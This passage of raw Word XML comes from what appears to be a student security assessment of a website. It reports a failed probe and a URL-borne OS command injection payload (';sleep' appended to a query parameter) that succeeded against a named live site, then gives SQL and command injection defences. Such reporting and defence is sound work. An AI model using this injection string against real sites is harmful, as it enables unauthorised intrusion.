        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;html&gt;&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CFDDE4" w14:textId="77777777" w:rsidR="00A446EC" w:rsidRPr="00A446EC" w:rsidRDefault="00A446EC" w:rsidP="00A446EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;title&gt;403 Forbidden&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61804247" w14:textId="77777777" w:rsidR="00A446EC" w:rsidRPr="00A446EC" w:rsidRDefault="00A446EC" w:rsidP="00A446EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;/head&gt;&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107B7E74" w14:textId="77777777" w:rsidR="00A446EC" w:rsidRPr="00A446EC" w:rsidRDefault="00A446EC" w:rsidP="00A446EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;h1&gt;Forbidden&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAEE7C1" w14:textId="77777777" w:rsidR="00A446EC" w:rsidRPr="00A446EC" w:rsidRDefault="00A446EC" w:rsidP="00A446EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;p&gt;You don't have permission to access /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>wp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>-content/plugins/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>wunderground</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/widget.min.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFDB91F" w14:textId="77777777" w:rsidR="00A446EC" w:rsidRPr="00A446EC" w:rsidRDefault="00A446EC" w:rsidP="00A446EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> this server.&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>br</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB3A436" w14:textId="77777777" w:rsidR="00A446EC" w:rsidRPr="00A446EC" w:rsidRDefault="00A446EC" w:rsidP="00A446EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AFB68A" w14:textId="77777777" w:rsidR="00A446EC" w:rsidRPr="00A446EC" w:rsidRDefault="00A446EC" w:rsidP="00A446EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;p&gt;Additionally, a 404 Not Found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FA769D" w14:textId="77777777" w:rsidR="00A446EC" w:rsidRPr="00A446EC" w:rsidRDefault="00A446EC" w:rsidP="00A446EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> was encountered while trying to use an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ErrorDocument</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle the request.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A564DE" w14:textId="77777777" w:rsidR="00A446EC" w:rsidRPr="00A446EC" w:rsidRDefault="00A446EC" w:rsidP="00A446EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&lt;/body&gt;&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1B47A2" w14:textId="77777777" w:rsidR="00A446EC" w:rsidRDefault="00A446EC" w:rsidP="00F05BE8"/>
    <w:p w14:paraId="5D97C10E" w14:textId="77777777" w:rsidR="00A446EC" w:rsidRDefault="00A446EC" w:rsidP="00F05BE8">
      <w:r>
        <w:t xml:space="preserve">The code above shows the attack failed since we do not have permission to access that file on the server, this means they do have some form of protection on the server to help stop Remote OS Command Injections. Another URL which was used for this attack was </w:t>
      </w:r>
      <w:r w:rsidRPr="00A446EC">
        <w:t>http://cupstv.com/wp-content/themes/sahifa/css/ie8.css</w:t>
      </w:r>
      <w:r w:rsidRPr="00A446EC">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>?query=query%3Bsleep+%7B0%7D%3B HTTP/1</w:t>
      </w:r>
      <w:r>
        <w:t>, the red text once again shows the infected code. This URL looked to be successful since ZAP stated the response as “</w:t>
      </w:r>
      <w:r w:rsidRPr="00A446EC">
        <w:t>HTTP/1.1 200 OK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”. If navigating to this webpage it does give off results, please see appendices </w:t>
      </w:r>
      <w:r w:rsidR="00667DEF">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>. This demonstrates that the website does have a weakness against Remote OS Command Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D62090" w14:textId="77777777" w:rsidR="00DF4FD8" w:rsidRDefault="00DF4FD8" w:rsidP="00F05BE8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EABEC0F" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C" w:rsidP="001B121C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc501124792"/>
      <w:r w:rsidRPr="001B121C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>7.</w:t>
      </w:r>
      <w:r w:rsidR="00E177C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Solution and Cost</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="148BDAB0" w14:textId="77777777" w:rsidR="00E177C3" w:rsidRDefault="00E177C3" w:rsidP="00E177C3"/>
    <w:p w14:paraId="5451403E" w14:textId="77777777" w:rsidR="00597484" w:rsidRDefault="00E177C3" w:rsidP="00E177C3">
      <w:r>
        <w:t xml:space="preserve">Each flaw should be prioritised </w:t>
      </w:r>
      <w:r w:rsidR="00597484">
        <w:t>by which is the highest risk, the first flaw which should be resolved is the SQL Injection. To do this there are multiple steps which can be put in place to stop SQL injection, the first is to not trust client-side input even if there is a client-side validation in place. If the user side input is not trusted, then neither is SQL Injection. A very basic but effective way to stop SQL Injection is to type check all data on the server-side</w:t>
      </w:r>
      <w:r w:rsidR="000042DC">
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidR="000042DC" w:rsidRPr="000042DC">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>ASP.NET</w:t>
      </w:r>
      <w:r w:rsidR="00597484">
        <w:t>. It is also possible to a</w:t>
      </w:r>
      <w:r w:rsidR="00597484" w:rsidRPr="00597484">
        <w:t>pply a 'whitelist' of allowed characters, or a 'blacklist' of disallowed characters in user input</w:t>
      </w:r>
      <w:r w:rsidR="00597484">
        <w:t xml:space="preserve"> to stop the possibility of SQL Injection</w:t>
      </w:r>
      <w:r w:rsidR="00471E5B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00471E5B">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "9780128013755", "abstract" : "There is a lot at stake for administrators taking care of servers, since they house sensitive data like credit cards, social security numbers, medical records, and much more. In Securing SQL Server you will learn about the potential attack vectors that can be used to break into your SQL Server database, and how to protect yourself from these attacks. Written by a Microsoft SQL Server MVP, you will learn how to properly secure your database, from both internal and external threats. Best practices and specific tricks employed by the author will also be revealed. Learn expert techniques to protect your SQL database environment. Author Denny Cherry is an MVP by Microsoft for his expertise in the SQL Server product Learn expert techniques to protect your SQL database environment Discover how to identify what an intruder accessed or damaged. \"There is a lot at stake for administrators taking care of servers, since they house sensitive data like credit cards, social security numbers, medical records, and much more. In Securing SQL Server you will learn about the potential attack vectors that can be used to break into your SQL Server database, and how to protect yourself from these attacks. Written by a Microsoft SQL Server MVP, you will learn how to properly secure your database, from both internal and external threats. Best practices and specific tricks employed by the author will also be revealed. Learn expert techniques to protect your SQL database environment\"-- Chapter 1: Securing the Network Chapter 2: Database Encryption Chapter 3: SQL Password Security Chapter 4: Securing the Instance Chapter 5: Additional Security for an Internet Facing SQL Server and Application Chapter 6: SQL Injection Attacks Chapter 7: Database Backup Security Chapter 8: Auditing for Security Chapter 9: Server Rights Appendix A: External Audit Checklists. Machine generated contents note: Chapter 1: Securing the Network Chapter 2: Database Encryption Chapter 3: SQL Password Security Chapter 4: Securing the Instance Chapter 5: Additional Security for an Internet Facing SQL Server and Application Chapter 6: SQL Injection Attacks Chapter 7: Database Backup Security Chapter 8: Auditing for Security Chapter 9: Server Rights Appendix A: External Audit Checklists.", "author" : [ { "dropping-particle" : "", "family" : "Cherry", "given" : "Denny.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2011" ] ] }, "publisher" : "Syngress", "title" : "Securing SQL server : protecting your database from attackers", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=b41291be-5625-3b59-ab7d-518bc106b63c" ] }, { "id" : "ITEM-2", "itemData" : { "ISBN" : "1847194893", "author" : [ { "dropping-particle" : "", "family" : "Canavan", "given" : "Tom.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-2", "issued" : { "date-parts" : [ [ "2008" ] ] }, "publisher" : "Packt Pub", "title" : "Joomla! web security : secure your Joomla! website from common security threats with this easy-to-use guide", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=77d60a4a-eada-3508-8121-04efecdbdd45" ] } ], "mendeley" : { "formattedCitation" : "[22], [23]", "plainTextFormattedCitation" : "[22], [23]", "previouslyFormattedCitation" : "[22], [23]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00471E5B">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B73058" w:rsidRPr="00B73058">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[22], [23]</w:t>
      </w:r>
      <w:r w:rsidR="00471E5B">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00597484">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00471E5B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00471E5B" w:rsidRPr="00471E5B">
        <w:t>Avoid using the '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00471E5B" w:rsidRPr="00471E5B">
        <w:t>sa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00471E5B" w:rsidRPr="00471E5B">
        <w:t>' or '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00471E5B" w:rsidRPr="00471E5B">
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00471E5B" w:rsidRPr="00471E5B">
        <w:t>-owner' database users</w:t>
      </w:r>
      <w:r w:rsidR="00471E5B">
        <w:t xml:space="preserve"> since these are typically used as default </w:t>
      </w:r>
      <w:r w:rsidR="00471E5B">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "9781597499637", "abstract" : "2nd ed. SQL Injection Attacks and Defense, First Edition: Winner of the Best Book Bejtlich Read Award \"SQL injection is probably the number one problem for any server-side application, and this book unequaled in its coverage.\"--Richard Bejtlich, Tao Security blog SQL injection represents one of the most dangerous and well-known, yet misunderstood, security vulnerabilities on the Internet, largely because there is no central repository of information available for penetration testers, IT security consultants and practitioners, and web/software developers to turn to for help. SQL Injection Attacks an. What is SQL injection? -- Testing for SQL injection -- Reviewing code for SQL injection -- Exploiting SQL injection -- Blind SQL injection exploitation -- Exploiting the operating system -- Advanced topics -- Code-level defenses -- Platform level defenses -- Confirming and recovering from SQL injection attacks.", "author" : [ { "dropping-particle" : "", "family" : "Clarke", "given" : "Justin.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2012" ] ] }, "number-of-pages" : "547", "publisher" : "Elsevier", "title" : "SQL injection attacks and defense", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=225c764d-9ef7-36e8-9033-582c3659468b" ] }, { "id" : "ITEM-2", "itemData" : { "ISBN" : "9780128013755", "abstract" : "There is a lot at stake for administrators taking care of servers, since they house sensitive data like credit cards, social security numbers, medical records, and much more. In Securing SQL Server you will learn about the potential attack vectors that can be used to break into your SQL Server database, and how to protect yourself from these attacks. Written by a Microsoft SQL Server MVP, you will learn how to properly secure your database, from both internal and external threats. Best practices and specific tricks employed by the author will also be revealed. Learn expert techniques to protect your SQL database environment. Author Denny Cherry is an MVP by Microsoft for his expertise in the SQL Server product Learn expert techniques to protect your SQL database environment Discover how to identify what an intruder accessed or damaged. \"There is a lot at stake for administrators taking care of servers, since they house sensitive data like credit cards, social security numbers, medical records, and much more. In Securing SQL Server you will learn about the potential attack vectors that can be used to break into your SQL Server database, and how to protect yourself from these attacks. Written by a Microsoft SQL Server MVP, you will learn how to properly secure your database, from both internal and external threats. Best practices and specific tricks employed by the author will also be revealed. Learn expert techniques to protect your SQL database environment\"-- Chapter 1: Securing the Network Chapter 2: Database Encryption Chapter 3: SQL Password Security Chapter 4: Securing the Instance Chapter 5: Additional Security for an Internet Facing SQL Server and Application Chapter 6: SQL Injection Attacks Chapter 7: Database Backup Security Chapter 8: Auditing for Security Chapter 9: Server Rights Appendix A: External Audit Checklists. Machine generated contents note: Chapter 1: Securing the Network Chapter 2: Database Encryption Chapter 3: SQL Password Security Chapter 4: Securing the Instance Chapter 5: Additional Security for an Internet Facing SQL Server and Application Chapter 6: SQL Injection Attacks Chapter 7: Database Backup Security Chapter 8: Auditing for Security Chapter 9: Server Rights Appendix A: External Audit Checklists.", "author" : [ { "dropping-particle" : "", "family" : "Cherry", "given" : "Denny.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-2", "issued" : { "date-parts" : [ [ "2011" ] ] }, "publisher" : "Syngress", "title" : "Securing SQL server : protecting your database from attackers", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=b41291be-5625-3b59-ab7d-518bc106b63c" ] } ], "mendeley" : { "formattedCitation" : "[4], [22]", "plainTextFormattedCitation" : "[4], [22]", "previouslyFormattedCitation" : "[4], [22]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00471E5B">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B73058" w:rsidRPr="00B73058">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[4], [22]</w:t>
      </w:r>
      <w:r w:rsidR="00471E5B">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00471E5B" w:rsidRPr="00471E5B">
        <w:t>. This does not eliminate SQL injection, but minimizes its impact.</w:t>
      </w:r>
      <w:r w:rsidR="00471E5B">
        <w:t xml:space="preserve"> Another standard form of protection is to only grant </w:t>
      </w:r>
      <w:r w:rsidR="00471E5B" w:rsidRPr="00471E5B">
        <w:t>the minimum database access that is necessary for the application</w:t>
      </w:r>
      <w:r w:rsidR="00471E5B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:t xml:space="preserve"> The most effective method to stop SQL Injection is to escape all data received by the client, this done using the code within the web page. By adding the string </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B73058" w:rsidRPr="00B73058">
        <w:t>mysql_real_escape_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B73058" w:rsidRPr="00B73058">
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:t xml:space="preserve"> where ever user input is needed this will stop the web page from seeing user input as a query when SQL Injection is attempted </w:t>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "1484221206", "abstract" : "Includes index. This is a quick read, at just over 100 pages. This is a handbook style guide to specific items you can act on. Is your PHP app truly secure? Let's make sure you get home on time and sleep well at night. Learn the security basics that a senior developer usually acquires over years of experience, all condensed down into one quick and easy handbook. Do you ever wonder how vulnerable you are to being hacked? Do you feel confident about storing your users sensitive information? Imagine feeling confident in the integrity of your software when you store your user's sensitive data. No more fighting fires with lost data, no more late nights, your application is secure. In this short book I'll give you clear, actionable details on how to secure various parts of your web application. You will also find scenarios to handle and improve existing legacy issues. What you'll learn Never trust your users - escape all input HTTPS/SSL/BCA/JWH/SHA and other random letters, some of them actually matter Password Encryption and Storage for Everyone Authentication, Access Control, and Safe File Handing Safe Defaults, Cross Site Scripting and other Popular Hacks. 1. Never Trust Your Users. Sanitize ALL Input! -- 2. HTTPS/SSL/BCA/JWH/SHA and Other Random Letters; Some of Them Actually Matter -- 3. Password Encryption and Storage for Everyone -- 4. Authentication, Access Control, and Safe File Handing -- 5. Safe Defaults, Cross Site Scripting, and Other Popular Hacks.", "author" : [ { "dropping-particle" : "", "family" : "Edmunds", "given" : "Ben", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "number-of-pages" : "52", "title" : "Securing PHP apps", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=32c2b417-3094-3879-b0c0-e92c06ab6fdd" ] } ], "mendeley" : { "formattedCitation" : "[24]", "plainTextFormattedCitation" : "[24]", "previouslyFormattedCitation" : "[24]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B73058" w:rsidRPr="00B73058">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[24]</w:t>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "0596514018", "abstract" : "2nd ed. PHP and MySQL are quickly becoming the de facto standard for rapid development of dynamic, database-driven web sites. This book is perfect for newcomers to programming as well as hobbyists who are intimidated by harder-to-follow books. With concepts explained in plain English, the new edition starts with the basics of the PHP language, and explains how to work with MySQL, the popular open source database. You then learn how to put the two together to generate dynamic content. If you come from a web design or graphics design background and know your way around HTML, Learnin. 1. Dynamic content and the Web -- 2. Installation -- 3. Exploring PHP -- 4. PHP decision-making -- 5. Functions -- 6. Arrays -- 7. Working with MySQL -- 8. Database best practices -- 9. Getting PHP to talk to MySQL -- 10. Working with forms -- 11. Practical PHP -- 12. XHTML -- 13. Modifying MySQL objects and PHP data -- 14. Cookies, sessions, and access control -- 15. Security -- 16. Validation and error handling -- 17. Sample application -- 18. Finishing your journey.", "author" : [ { "dropping-particle" : "", "family" : "Davis", "given" : "Michele E.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" }, { "dropping-particle" : "", "family" : "Phillips", "given" : "Jon A. (Jon Andrew)", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2007" ] ] }, "publisher" : "O'Reilly", "title" : "Learning PHP and MySQL", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=cc6cd6e8-2314-37a6-8c46-2d004a467f1d" ] } ], "mendeley" : { "formattedCitation" : "[25]", "plainTextFormattedCitation" : "[25]", "previouslyFormattedCitation" : "[25]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B73058" w:rsidRPr="00B73058">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[25]</w:t>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00ED7B17">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00ED7B17">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "1491906979", "abstract" : "Third edition. Includes index. Build interactive, data-driven websites with the potent combination of open-source technologies and web standards, even if you only have basic HTML knowledge. With this popular hands-on guide, you'll tackle dynamic web programming with the help of today's core technologies: PHP, MySQL, JavaScript, CSS, and HTML5. Introduction to dynamic web content -- Setting up a development server -- Introduction to PHP -- Expressions and control flow in PHP -- PHP functions and objects -- PHP arrays -- Practical PHP -- Introduction to MySQL -- Mastering MySQL -- Accessing MySQL using PHP -- Using the mysqli extension -- Form handling -- Cookies, sessions, and authentication -- Exploring JavaScript -- Expressions and control flow in JavaScript -- JavaScript functions, objects, and arrays -- JavaScript and PHP validation and error handling -- Using Ajax -- Introduction to CSS -- Advanced CSS with CSS3 -- Accessing CSS from JavaScript -- Introduction to HTML5 -- The HTML5 canvas -- HTML5 audio and video -- Other HTML5 features -- Bringing it all together.", "author" : [ { "dropping-particle" : "", "family" : "Nixon", "given" : "Robin", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "number-of-pages" : "700", "title" : "Learning PHP, MySQL, JavaScript, CSS &amp;amp; HTML5", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=acbb541f-2bfb-3d24-8966-2ab1a7a04dc7" ] } ], "mendeley" : { "formattedCitation" : "[26]", "plainTextFormattedCitation" : "[26]", "previouslyFormattedCitation" : "[26]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00ED7B17">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00ED7B17" w:rsidRPr="00ED7B17">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[26]</w:t>
      </w:r>
      <w:r w:rsidR="00ED7B17">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B73058">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1A6E1A" w14:textId="77777777" w:rsidR="00ED7B17" w:rsidRDefault="00ED7B17" w:rsidP="00E177C3"/>
    <w:p w14:paraId="2CFEC4A5" w14:textId="77777777" w:rsidR="002B1F54" w:rsidRDefault="00ED7B17" w:rsidP="002B1F54">
      <w:r>
        <w:t>The next high-risk flaw that needs to be resolved is the possibility of Remote OS Command Injection. Similar to the SQL Injection once again there are multiple steps which can be implemented to protect against this form of attack. The first is to use library calls in place of an external processing to recreate the desired functionality, this means using a dynamic</w:t>
      </w:r>
      <w:r w:rsidR="002B1F54">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED7B17">
        <w:t>or statically linked</w:t>
      </w:r>
      <w:r w:rsidR="002B1F54">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED7B17">
        <w:t>library</w:t>
      </w:r>
      <w:r w:rsidR="002B1F54">
        <w:t xml:space="preserve"> which holds the commands </w:t>
      </w:r>
      <w:r w:rsidR="002B1F54">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="002B1F54">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "0321711378", "abstract" : "Hardware, processes, and threads -- Coding for performance -- Identifying opportunities for parallelism -- Synchronization and data sharing -- Using POSIX threads -- Windows threading -- Using automatic parallelization and OpenMP -- Handcoded synchronization and sharing -- Scaling with multicore processors -- Other parallelization technologies -- Concluding remarks.", "author" : [ { "dropping-particle" : "", "family" : "Gove", "given" : "Darryl.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2011" ] ] }, "number-of-pages" : "441", "publisher" : "Addison-Wesley", "title" : "Multicore application programming : for Windows, Linux, and Oracle Solaris", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=32ccef34-91c0-38e1-aa74-479656813ab6" ] } ], "mendeley" : { "formattedCitation" : "[27]", "plainTextFormattedCitation" : "[27]", "previouslyFormattedCitation" : "[27]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="002B1F54">
